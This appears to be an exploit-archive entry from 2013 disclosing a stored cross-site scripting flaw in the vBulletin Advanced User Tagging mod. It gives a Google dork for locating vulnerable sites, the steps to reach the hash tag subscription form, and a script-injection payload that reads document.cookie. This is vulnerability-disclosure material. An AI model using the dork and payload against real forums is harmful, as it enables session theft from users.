vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability
# Published : 2013-07-10
# Author :
# Previous Title : Collabtive 1.0 (manageuser.php, task param) - SQL Injection Vulnerability
# Next Title : C.P.Sub 4.5 - Authentication Bypass

##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x 
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions 
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk. 
# Author will be not responsible for any damage caused! user assumes all responsibility.  
# Intended for authorized web application pentesting only! 
#
##########################################################################################